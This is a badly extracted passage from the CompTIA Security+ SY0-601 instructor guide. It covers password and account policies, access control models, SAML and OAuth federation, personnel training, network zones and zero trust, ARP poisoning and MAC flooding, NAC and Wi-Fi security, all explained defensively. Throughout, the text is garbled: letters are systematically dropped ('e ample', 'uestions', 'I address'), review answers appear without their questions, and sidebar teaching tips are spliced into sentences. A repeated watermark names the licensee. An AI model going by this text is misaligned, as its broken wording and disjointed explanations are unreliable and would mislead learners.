• Comple ity rules should not be enforced. The user should be allowed to choose
a password or other memori ed secret of between and A CII or NIC D
characters, including spaces. The only restriction should be to block common
passwords, such as dictionary words, repetitive strings like , strings
found in breach databases, and strings that repeat conte tual information, such as
username or company name.
• Aging policies should not be enforced. sers should be able to select if and when
a password should be changed, though the system should be able to force a
password change if compromise is detected.
• Password hints should not be used. A password hint allows account recovery by
submitting responses to personal information, such as first school or pet name.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 193
Password reuse can also mean using a work password elsewhere (on a website, for
instance). This sort of behavior can only be policed by soft policies.
To make the task of compromising the user security system harder, account Account Restrictions
restrictions can be used.
Location-Based Policies
A user or device can have a logical network location, identified by an I address,
subnet, virtual LAN LAN , or organi ational unit . This can be used as an account
restriction mechanism. or e ample, a user account may be prevented from logging on
locally to servers within a restricted OU.
The geographical location of a user or device can also be calculated using a geolocation
mechanism. There are several types of geolocation:
• I address these can be associated with a map location to varying degrees of
accuracy based on information published by the registrant, including name, country,
region, and city. The registrant is usually the Internet service provider I , so the
information you receive will provide an appro imate location of a host based on the
I . If the I is one that serves a large or diverse geographical area, you will be less
likely to pinpoint the location of the host Internet service providers I s . oftware
libraries, such as eoI maxmind.com/en/geoip-demo , facilitate uerying this data.
• Location ervices these are methods used by the to calculate the device's
geographical position. A device with a global positioning system sensor
can report a highly accurate location when outdoors. Location services can also
triangulate to cell towers, i i hotspots, and luetooth signals where is not
supported.
Time-Based Restrictions
There are three main types of time based policies
• A time of day policy establishes authori ed logon hours for an account.
• A time based login policy establishes the ma imum amount of time an account may
be logged in for.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
194 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• An impossible travel time risky login policy tracks the location of login events over
time. If these do not meet a threshold, the account will be disabled. or e ample, a
user logs in to an account from a device in New ork. A couple of hours later, a login
attempt is made from LA, but this is refused and an alert raised because it is not
feasible for the user to be in both locations.
Account auditing also refers to more general change control. ou need to take account
of changes to resources and users. esources may be updated, archived, or have their
clearance level changed. sers may leave, arrive, or change obs roles . or e ample,
if a user has moved to a new ob, old privileges may need to be revoked and new ones
granted. This process is referred to as recertification. Managing these sorts of changes
efficiently and securely re uires e ective standard operating procedures s and
clear and timely communication between departments between IT and , for instance .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 195
here many users, groups, roles, and resources are involved, managing account Account ermissions
permissions is comple and time consuming. Improperly configured accounts can
have two di erent types of impact. n the one hand, setting privileges that are too
restrictive creates a large volume of support calls and reduces productivity. n the
other hand, granting too many privileges to users weakens the security of the system
and increases the risk of things like malware infection and data breach.
The phrase "authorization creep" refers to an employee who gains more and more access
privileges the longer they remain with the organization.
A user may be granted elevated privileges temporarily escalation . In this case, some
system needs to be in place to ensure that the privileges are revoked at the end of the
agreed period.
A system of auditing needs to be put in place so that privileges are reviewed regularly.
Auditing would include monitoring group membership and reviewing access control
lists for each resource plus identifying and disabling unnecessary accounts.
sage auditing means configuring the security log to record key indicators and then Account Permissions
reviewing the logs for suspicious activity. Determining what to log is one of the most sage Audits
considerable challenges a network administrator can face. or Active Directory,
Microsoft has published audit policy recommendations for baseline re uirements and
networks with stronger security re uirements docs.microsoft.com en us windows
server/identity/ad-ds/plan/security-best-practices/audit-policy-recommendations .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
196 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Process creation.
• Changes to system security and integrity anti virus, host firewall, and so on .
Configuring audit entries for a folder in indows. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 197
Setting a property to disable an account. (Screenshot used with permission from icrosoft.)
An account lockout means that login is prevented for a period. This might be
done manually if a policy violation is detected, but there are several scenarios for
automatically applying a lockout:
• An incorrect account password is entered repeatedly.
• The account is set to expire. Setting an account expiration date means that an
account cannot be used beyond a certain date. This option is useful on accounts for
temporary and contract sta .
• hen using time or location based restrictions, the server periodically checks
whether the user has the right to continue using the network. If the user does not
have the right, then an automatic logout procedure commences.
Configuring an account lockout policy. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
198 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Account Policies
Answer the following uestions
More users would forget their password, try to select unsecure ones, or write them
down record them in a non secure way like a sticky note .
3. What is the name of the policy that prevents users from choosing old
passwords again?
An I address can represent a logical location subnet on a private network. Most types
of public I address can be linked to a geographical location, based on information
published by the registrant that manages that block of i address space.
A user's actions are logged on the system. ach user is associated with a uni ue
computer account. As long as the user's authentication is secure and the logging
system is tamper proof, they cannot deny having performed the action.
sage events must be recorded in a log. Choosing which events to log will be guided by
an audit policy.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 199
Topic 8C
Implement Authorization Solutions
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
200 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring an access control entry for a folder. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 201
The e ect of this command is to append write permission to the group conte t and
remove e ecute permission from the other conte t. y contrast, the command can also
be used to replace e isting permissions. or e ample, the following command applies
the configuration shown in the first permission string
chmod u=rwx,g=rx,o=rx home
In absolute mode, permissions are assigned using octal notation, where r ,w , and
. or e ample, the following command has the same e ect
chmod 755 home
The DAC and AC models e pose privileged accounts to the threat of compromise. Mandatory and
More restrictive access control models can be used to mitigate this threat. Attribute-Based Access
Control
Mandatory Access Control (MAC)
Mandatory access control (MAC) is based on the idea of security clearance levels.
ather than defining ACLs on resources, each ob ect and each sub ect is granted a
clearance level, referred to as a label. If the model used is a hierarchical one that is,
high clearance users are trusted to access low clearance ob ects , sub ects are only
permitted to access objects at their own clearance level or below.
The labelling of ob ects and sub ects takes place using pre established rules. The critical
point is that these rules cannot be changed by any sub ect account, and are therefore
non discretionary. Also, a sub ect is not permitted to change an ob ect's label or to
change his or her own label.
Rule-based access control is a term that can refer to any sort of access control model Rule-Based Access
where access control policies are determined by system enforced rules rather than Control
system users. As such, AC, A AC, and MAC are all e amples of rule based or non
discretionary access control. As well as the formal models, rule based access control Teaching
principles are increasingly being implemented to protect computer and network Tip
systems founded on discretionary access from the sort of misconfiguration that can Rule-based access
occur through DAC. control is also not
necessarily dependent
Conditional Access on the identity of the
user a firewall ACL,
Conditional access is an e ample of rule based access control. A conditional access for instance .
system monitors account or device behavior throughout a session. If certain
conditions are met, the account may be suspended or the user may be required to
re authenticate, perhaps using a step verification method. The ser Account Control
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
202 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
rowsing ob ects in an Active irectory AP schema. (Screenshot used with permission from icrosoft.)
The types of attributes, what information they contain, and the way ob ect types are
defined through attributes some of which may be re uired, and some optional is
described by the directory schema. ome of the attributes commonly used include
common name CN , organi ational unit , organi ation , country C , and domain
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 203
An on premises network can use technologies such as LDA and eberos, very often ederation and
implemented as a indows Active Directory network, because the administration Attestation
of accounts and devices can be centrali ed. panding this type of network to share
resources with business partners or use services in public clouds means implementing Teaching
some type of federation technology. Tip
Make sure that
Federation students understand
the concepts of
Federation is the notion that a network needs to be accessible to more than just a federation and trusts
well defined group of employees. In business, a company might need to make parts of and that AML is a
its network open to partners, suppliers, and customers. The company can manage its means of e changing
authorizations in a
employee accounts easily enough. Managing accounts for each supplier or customer federated network.
internally may be more difficult. ederation means that the company trusts accounts
created and managed by a di erent network. As another e ample, in the consumer
world, a user might want to use both oogle Apps and Twitter. If oogle and Twitter
establish a federated network for the purpose of authentication and authori ation,
then the user can log on to Twitter using his or her oogle credentials or vice versa.
2. The principal authenticates with the identity provider and obtains an attestation
of identity, in the form of some sort of token or document signed by the Id .
3. The principal presents the attestation to the service provider. The SP can validate
that the Id has signed the attestation because of its trust relationship with
the Id .
4. The service provider can now connect the authenticated principal to its own
accounts database. It may be able to uery attributes of the user account profile
held by the Id , if the principal has authori ed this type of access.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
204 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 205
IssueInstant="2020-01-01T20:00:10Z "
Destination="https://sp.foo/saml/acs"
InResponseTo="100".
<saml:Issuer>https://idp.foo/sso</saml:Issuer>
<ds:Signature>...</ds:Signature>
<samlp:Status>...(success)...</samlp:Status.
<saml:Assertion xmlns:xsi="http://www.w3.org/2001/
XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="2000"
Version="2.0"
IssueInstant="2020-01-01T20:00:09Z">
<saml:Issuer>https://idp.foo/sso</saml:Issuer>
<ds:Signature>...</ds:Signature>
<saml:Subject>...
<saml:Conditions>...
<saml:AudienceRestriction>...
<saml:AuthnStatement>...
<saml:AttributeStatement>
<saml:Attribute>...
<saml:Attribute>...
</saml:AttributeStatement>
</saml:Assertion>
</samlp:Response> Show Slide(s)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
206 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The client app or service must be registered with the authori ation server. As part of
this process, the client registers a redirect URL, which is the endpoint that will process
authorization tokens. Registration also provides the client with an ID and a secret.
The ID can be publicly e posed, but the secret must be kept confidential between the
client and the authori ation server. hen the client application re uests authori ation,
the user approves the authorization server to grant the request using an appropriate
method. Auth supports several grant types or ows for use in di erent conte ts,
such as server to server or mobile app to server. Depending on the ow type, the
client will end up with an access token validated by the authorization server. The client
presents the access token to the resource server, which then accepts the re uest for
the resource if the token is valid.
Auth uses the Java cript ob ect notation J N web token J T format for claims
data. J Ts can easily be passed as ase encoded strings in Ls and TT headers
and can be digitally signed for authentication and integrity.
ote that OpenI can also refer to an earlier protocol developed between 00 and 00 .
This implemented a similar framework and underpinned early "sign on with" functionality,
but is now regarded as obsolete. OpenI uses -format messaging and supports only
web applications and not mobile apps.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 207
Review Activity:
Authorization Solutions
Answer the following uestions
It is easier for users to ad ust the policy to fit changing business needs. Centrali ed
policies can easily become in e ible and bureaucratic.
2. hat is the di erence et een securit roup and role ased permissions
management?
A group is simply a container for several user ob ects. Any organi ing principle can be
applied. In a role based access control system, groups are tightly defined according to
ob functions. Also, a user should logically only possess the permissions of one role at
a time.
3. In a rule-based access control model, can a subject negotiate with the data
owner for access privileges? Why or why not?
This sort of negotiation would not be permitted under rule based access control it is a
feature of discretionary access control.
To store information about network resources and users in a format that can be
accessed and updated using standard queries.
True.
6. You are working on a cloud application that allows users to log on with
social media accounts over the web and from a mobile application. Which
protocols would you consider and which would you choose as most
suitable?
ecurity Association Markup Language AML and auth penID Connect IDC .
Auth with IDC as an authentication layer o ers better support for native mobile
apps so is probably the best choice.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
208 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 8D
Explain the Importance
o ersonnel olicies
Show Slide(s)
Conduct olicies
Operational policies include privilege/credential management, data handling, and
Conduct olicies incident response. Other important security policies include those governing employee
conduct and respect for privacy.
Accepta le se olic
nforcing an acceptable use policy (AUP) is important to protect the organization
from the security and legal implications of employees misusing its e uipment.
Typically, the policy will forbid the use of e uipment to defraud, defame, or to obtain
illegal material. It will prohibit the installation of unauthori ed hardware or software
and e plicitly forbid actual or attempted snooping of confidential data that the
employee is not authorized to access. Acceptable use guidelines must be reasonable
and not interfere with employees' fundamental ob duties or privacy rights. An
organi ation's A may forbid use of Internet tools outside of work related duties or
restrict such use to break times.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 209
Clean es olic
A clean desk policy means that each employee's work area should be free from any
documents left there. The aim of the policy is to prevent sensitive information from
being obtained by unauthori ed sta or guests at the workplace.
Another essential component of a secure system is e ective user training. ntrained User and Role-Based
users represent a serious vulnerability because they are susceptible to social Training
engineering and malware attacks and may be careless when handling sensitive or
confidential data.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
210 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• ite security procedures, restrictions, and advice, including safety drills, escorting
guests, use of secure areas, and use of personal devices.
• ecure use of software such as browsers and email clients plus appropriate use of
Internet access, including social networking sites.
There should also be a system for identifying sta performing security sensitive
roles and grading the level of training and education re uired between beginner,
intermediate, and advanced, for instance . Note that in defining such training
programs you need to focus on ob roles, rather than ob titles, as employees may
perform di erent roles and have di erent security training, education, or awareness
requirements in each role.
The IST ational Initiative for Cybersecurity Education framework (nist.gov itl applied-
cybersecurity/nice) sets out knowledge, skills, and abilities ( SAAs) for different cybersecurity
roles. Security awareness programs are described in SP 00- 0 (nvlpubs.nist.gov/nistpubs/
egacy SP nistspecialpublication 00- 0.pdf).
Phishing Campaigns
A phishing campaign training event means sending simulated phishing messages to
users. sers that respond to the messages can be targeted for follow up training.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 211
and the participant must use analysis and appropriate tools to discover it. Capturing
the ag allows the user to progress to the ne t level and start a new challenge. nce
the participant has passed the introductory levels, they will join a team and participate
in a competitive event, where there are multiple ags embedded in the environment
and capturing them wins points for the participant and for their team.
• ranching scenarios students choose between options to find the best choices to
solve a cybersecurity incident or configuration problem.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
212 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Importance of Personnel Policies
Answer the following uestions
1. Your company has been the victim of several successful phishing attempts
over the past year. Attackers managed to steal credentials from these
attacks and used them to compromise key systems. What vulnerability
contributed to the success of these social engineers, and why?
A lack of proper user training directly contributes to the success of social engineering
attempts. Attackers can easily trick users when those users are unfamiliar with the
characteristics and ramifications of such deception.
mployees have di erent levels of technical knowledge and di erent work priorities.
This means that a one si e fits all approach to security training is impractical.
sing a diversity of training techni ues will boost engagement and retention. ractical
tasks, such as phishing simulations, will give attendees more direct experience.
orkshops or computer based training will make it easier to assess whether the
training has been completed.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 213
Lesson 8
Summary
You should be able to apply organizational and technical policies and training/ Teaching
awareness programs that reduce the risk of insider threat and account compromise. Tip
You should also be able to implement discretionary or rule-based access control Check that students
as appropriate and use protocols to communicate authori ations across federated are confident about
identity networks. the content that has
been covered. If there
is time, re-visit any
Guidelines for Implementing Identity and content examples that
they have questions
Account ana ement Controls about. If you have
used all the available
ollow these guidelines when you implement identity and account management time for this lesson
controls for local networks and cloud access block, note the issues,
and schedule time for
• stablish re uirements for access control between discretionary, role based, a review later in the
mandatory, and attribute based and whether the scope must include federated course.
services on premises and cloud, for instance .
Interaction
• Configure accounts roles and resources with the appropriate permissions settings, Opportunity
using the principle of least privilege. Optionally, ask
students if they have
• Configure account policies to protect integrity e perience of single
sign-on with cloud
• Credential policies to ensure protection of standard and privileged accounts, apps, and whether
including secure password selection. they are aware of the
implementation that
• Credential policies to manage shared, device, and third party A I secrets. it uses.
• rgani ational policies to apply separation of duties and ensure role specific
security awareness and training.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 9
Implementing Secure Network Designs
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
216 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 9A
Implement Secure Network Designs
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 217
• Mail transfer server this must connect with untrusted Internet hosts, so
communications between the untrusted network and trusted LAN must be carefully
controlled. Any data or software leaving or entering the network must be subject to
policy-based controls.
ou can see that this type of business ow will involve systems in di erent places in
the network. lacing the client, the mailbo , and the mail transfer server all within the
same logical network "segment" will introduce many vulnerabilities. Understanding and
controlling how data ows between these locations is a key part of secure and e ective
network design.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
218 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Appliances, protocols, and addressing functions within the OSI network layer reference model.
(Images 1 .com.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 219
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
220 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
within the same broadcast domain. Segregation means that the hosts in one segment
are restricted in the way they communicate with hosts in other segments. They might
only be able to communicate over certain network ports, for instance.
reely means that no network appliances or policies are preventing communications. Each
host may be configured with access rules or host firewalls or other security tools to prevent
access, but the "view from the network" is that hosts in the same segment are all free to
attempt to communicate.
osts are trusted in the sense that they are under your administrative control and sub ect to
the security mechanisms (anti-virus software, user rights, software updating, and so on) that
you have set up to defend the network.
A large network may need more ones to represent di erent host groups, such as
separating wireless stations from desktop workstations, and putting servers in their
own groups. Cisco's enterprise security architecture uses core and distribution layers
to interconnect access blocks, with each access block representing a di erent one and
business function.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 221
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
222 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• A DM for servers providing remote access to the local network via a irtual rivate
Network N.
Screened Subnet
A screened subnet uses two firewalls placed on either side of the DM . The edge
firewall restricts traffic on the e ternal public interface and allows permitted traffic
to the hosts in the DM . The edge firewall can be referred to as the screening firewall
or router. The internal firewall filters communications between hosts in the DM and
hosts on the LAN. This firewall is often described as the choke firewall. A choke point
is a purposefully narrow gateway that facilitates better access control and easier
monitoring.
Triple-Homed Firewall
A DM can also be established using one router firewall appliance with three network
interfaces, referred to as triple homed. ne interface is the public one, another is the
DM , and the third connects to the LAN. outing and filtering rules determine what
forwarding is allowed between these interfaces. This can achieve the same sort of
configuration as a screened subnet.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 223
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
224 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The Internet Society has published a white paper on security implications of IPv6
(internetsociety.org wp-content uploads 01 0 deploy 60-ipv6-security-v1.0.pdf).
Infoblox s white paper on migrating services to IPv6 provides more useful context (infoblox.
com wp-content uploads 016 0 infoblox-whitepaper-seven-deadly-traps-of-ipv6-
deployment 0.pdf).
Zero Trust
Zero trust is based on the idea that perimeter security is unlikely to be completely
robust. n a modern network, there are ust too many opportunities for traffic to
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 225
escape monitoring by perimeter devices and DM s. ero trust uses systems such as
continuous authentication and conditional access to mitigate privilege escalation and
account compromise by threat actors.
Another zero trust technique is to apply microsegmentation. Microsegmentation is a
security process that is capable of applying policies to a single node, as though it was
in a one of its own. Like east west traffic, this re uires a new generation of virtuali ed
security appliances to implement vmware.com/solutions/micro-segmentation.html .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
226 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Network Designs
Answer the following uestions
The Internet is an external zone where none of the hosts accessing your services can
be assumed trusted or authenticated. An extranet is a zone allowing controlled access
to semi trusted hosts, implying some sort of authentication. The hosts are semi trusted
because they are not under the administrative control of the organi ation as they are
owned by suppliers, customers, business partners, contractors, and so on .
y using two firewalls e ternal and internal around a screened subnet, or by using a
triple homed firewall one with three network interfaces .
This is typical of a data center or server farm, where a single e ternal re uest causes
multiple cascading requests between servers within the data center. This is a problem
for a perimeter security model, as funneling this traffic up to a firewall and then back to
a server creates a performance bottleneck.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 227
Topic 9B
Implement Secure
Switching and Routing
A host uses the Address Resolution Protocol (ARP) to discover the host on the local A oisoning and
segment that owns an I address. MAC Flooding Attacks
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
228 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A oisonin Attac s
An ARP poisoning attack uses a packet crafter, such as ttercap, to broadcast
unsolicited A reply packets. ecause A has no security mechanism, the receiving
devices trust this communication and update their MAC I address cache table with the
spoofed address.
• In frame , the . host tries to send a packet to the . host, but it is received
by the attacking host with the destination MAC a .
• In frame , the attacking host retransmits frame to the actual . host. ireshark
colors the frame black and red to highlight the retransmission.
• In frames and , you can see the reply from . , received by the attacking host in
frame 11 and retransmitted to the legitimate host in frame 12.
The usual target will be the subnet's default gateway the router that accesses other
networks . If the A poisoning attack is successful, all traffic destined for remote
networks will be sent to the attacker. The attacker can perform a man-in-the-middle
attack, either by monitoring the communications and then forwarding them to the
router to avoid detection, or modifying the packets before forwarding them. The
attacker could also perform a denial of service attack by not forwarding the packets.
AC loodin Attac s
here A poisoning is directed at hosts, AC oodin is used to attack a switch.
The intention of the attacker is to exhaust the memory used to store the switch's MAC
address table. The switch uses the MAC address table to determine which port to use to
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 229
forward unicast traffic to its correct destination. verwhelming the table can cause the
switch to stop trying to apply MAC based forwarding and ood unicast traffic out of all
ports, working as a hub. This makes sniffing network traffic easier for the threat actor.
An Ethernet switch's layer 2 forwarding function is similar to that of an older network Loop revention
appliance called a bridge. In a network with multiple bridges, implemented these
days as switches, there may be more than one path for a frame to take to its intended Teaching
destination. As a layer protocol, thernet has no concept of Time To Live. Therefore, Tip
layer broadcast traffic could continue to loop through a network with multiple Students should be
paths indefinitely. Layer loops are prevented by the Spanning Tree Protocol (STP). familiar with the
Spanning tree is a means for the bridges to organize themselves into a hierarchy and concept of T from
prevent loops from forming. the Network+ course.
STP configuration.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
230 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
DHCP Snooping
Another option is to configure namic ost Confi uration rotocol C
snooping. D C is the protocol that allows a server to assign I address information to
a client when it connects to the network. D C snooping inspects this traffic arriving on
access ports to ensure that a host is not trying to spoof its MAC address. It can also be
used to prevent rogue or spurious D C servers from operating on the network. ith
D C snooping, only D C messages from ports configured as trusted are allowed.
Additionally dynamic A inspection DAI , which can be configured alongside D C
snooping, prevents a host attached to an untrusted port from ooding the segment
with gratuitous A replies. DAI maintains a trusted database of I A mappings
and ensures that A packets are validly constructed and use valid I addresses
cisco.com c en us td docs switches lan catalyst ios configuration guide
book/snoodhcp.html .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 231
Endpoint security is a set of security procedures and technologies designed to restrict Network Access
network access at a device level. Endpoint security contrasts with the focus on Control
perimeter security established by topologies such as DM and technologies such as
firewalls. ndpoint security does not replace these but adds defense in depth. Teaching
Tip
The I . standard defines a port-based network access control (PNAC)
ou can mention
mechanism. NAC means that the switch uses an AAA server to authenticate the
zero-trust and
attached device before activating the port. Network access control (NAC) products unified endpoint
can extend the scope of authentication to allow administrators to devise policies or management M
profiles describing a minimum security configuration that devices must meet to be solutions as modern
granted network access. This is called a health policy. Typical policies check things such implementations of
as malware infection, firmware and patch level, personal firewall status, and the NAC.
presence of up to date virus definitions. A solution may also be to scan the registry or
perform file signature verification. The health policy is defined on a NAC management
server along with reporting and configuration tools.
Posture assessment is the process by which host health checks are performed against
a client device to verify compliance with the health policy. Most NAC solutions use
client software called an agent to gather information about the device, such as its anti
virus and patch status, presence of prohibited applications, or anything else defined by
the health policy.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
232 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Packet ence supports the use of several scanning techni ues, including vulnerability scanners, such
as essus and Open AS, indows anagement Instrumentation ( I) ueries, and log parsers.
(Screenshot used with permission from packetfence.org.)
Some NAC solutions can perform agentless posture assessment. This is useful when
Show Slide(s) the NAC solution must support a wide range of devices, such as smartphones, tablets,
and Internet of Things IoT devices, but less detailed information about the client is
oute ecurity available with an agentless solution.
Teaching
Tip
oute ecurit
tudents may benefit A successful attack against route security enables the attacker to redirect traffic from
from further reading its intended destination. n the Internet, this may allow the threat actor to herd users
on switching and to spoofed websites. n an enterprise network, it may facilitate circumventing firewalls
routing attacks. Cisco's
website is a valuable
and security ones to allow lateral movement and data e filtration.
source of information outes between networks and subnets can be configured manually, but most routers
and advice.
automatically discover routes by communicating with each other. Dynamic routers
oint out that you will exchange information about routes using routing protocols. It is important that this
discuss the functions
traffic be separated from channels used for other types of data. outing protocols
of firewalls in more
detail later in the do not always have e ective integral security mechanisms, so they need to run in an
course. environment where access is very tightly controlled.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 233
Sample routing table showing routes obtained from different sources, such as static configuration,
direct connection, and learned from the order Gateway Protocol ( GP) routing protocol.
• ource routing This uses an option in the I header to pre determine the route
a packet will take through the network strict or waypoints that it must pass
through loose . This can be used maliciously to spoof I addresses and bypass
router firewall filters. outers can be configured to block source routed packets.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
234 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Switching and Routing
Answer the following uestions
The attacker could trick computers into sending traffic through the attacker's computer
performing a MitM on path attack and, therefore, e amine traffic that would not
normally be accessible to him on a switched network .
ome network access control NAC solutions perform host health checks via a local
agent, running on the host. A dissolvable agent is one that is e ecuted in the host's
memory and C but not installed to a local disk.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 235
Topic 9C
Teaching
Tip
This is a long topic,
but hopefully students
should understand the
basics already. Focus
Wireless Network
Installation
EXAM OBJECTIVES COVERED Considerations
1. Given a scenario, analyze potential indicators associated with network attacks
. Given a scenario, install and configure wireless security settings Teaching
Tip
Technically, where
Most organizations have both a wired and a wireless network for employees to access multiple access points
provision the same
while on the move within their facilities. Understanding the potential threats and
network, the ID
vulnerabilities will allow you to successfully secure the wireless components of an should be referred to
organization's information systems infrastructure. as an Extended SSID
ID .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
236 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 237
known as a fat A , while one that re uires a wireless controller in order to function is
known as a thin A .
Controllers and access points must be made physically secure, as tampering could
allow a threat actor to insert a rogue evil twin A to try to intercept logons. These
devices must be managed like switches and routers, using secure management
interfaces and strong administrative credentials.
As well as the site design, a wireless network must be configured with security settings. i i rotected Access
ithout encryption, anyone within range can intercept and read packets passing over
the wireless network. These choices are determined by device support for the various Teaching
i i security standards, by the type of authentication infrastructure, and by the Tip
purpose of the WLAN. The security standard determines the cryptographic protocols , A, and T I
that are supported, the means of generating the encryption key, and available have been removed
methods for authenticating wireless stations when they try to oin or associate with from the ob ectives,
the network. but it seems safer
to mention them, if
The first version of Wi-Fi Protected Access (WPA) was designed to fi critical only as comparison to
vulnerabilities in the earlier wired equivalent privacy (WEP) standard. Like , A A .
version of A uses the C stream cipher but adds a mechanism called the We also mention Wi-Fi
Temporal Key Integrity Protocol (TKIP) to make it stronger. 6 as a note. This is
not on the current
syllabus, but students
will quickly encounter
it, so it seems worthy
of inclusion.
Interaction
Configuring a TP- I SO O access point with wireless encryption and authentication settings. In this Opportunity
